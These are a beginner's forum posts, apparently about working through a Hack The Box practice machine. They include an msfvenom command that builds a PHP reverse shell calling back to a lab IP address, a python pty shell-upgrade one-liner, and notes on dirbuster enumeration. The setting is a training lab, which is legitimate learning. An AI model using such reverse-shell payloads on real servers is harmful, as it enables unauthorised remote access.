Awesome, this is great. I figured there was a fair share of guesswork involved, but I knew there had to be at least a good approach, so thank you for the overview, it will be helpful
Again I'm new, this is the msfvenom command I'm using,
msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=1234 -f raw > shell2.htb
any red flags there?
EDIT: I guess I should mention the .htb extention is being run as .php by the server. Not …
I was using a bash shell, but I tried both for the sake of being thorough. I'm not even following the walkthrough necessarily in order to exploit the machine. The only reason I pulled it up in the first place was because my shell upgrade wasn't wo…
Yea I was already certain I had run it both ways just to make sure, but I just went and checked again, copy and pasted your command, and still nothing. My shell doesn't exit necessarily, just seems to kind of hang
Well, I've tried the single and double quotes in both orientations, and that was a typo in the post, but in my console I was not missing the second quotation around /bin/bash.
I've edited the original
Thanks, it was definitely the payload, I didn't even think about that. Got a shell now, unfortunately I'm running into more issues when I try to upgrade my shell. I'm running python -c 'import pty;pty.spawn("/bin/bash");' then nothing hap…
I appreciate the discussion. It's encouraging to hear that these things shouldn't be overwhelmingly obvious to a beginner. Thanks to TazWake's response before and now with the addition of other responses, I feel much better about not seeing the rou…
Fair enough, thanks for the thoughtful response. I don't mind the hard work and trial and error, in fact it's half the fun, but I do want to learn and get better as well, so I want to make sure I'm taking a productive approach. Your response was ve…
I eventually realized I needed to do some investigating of the dns in order for dirbuster to work properly, just inexperience but I eventually got it. Just updating in order to not waste anyone's time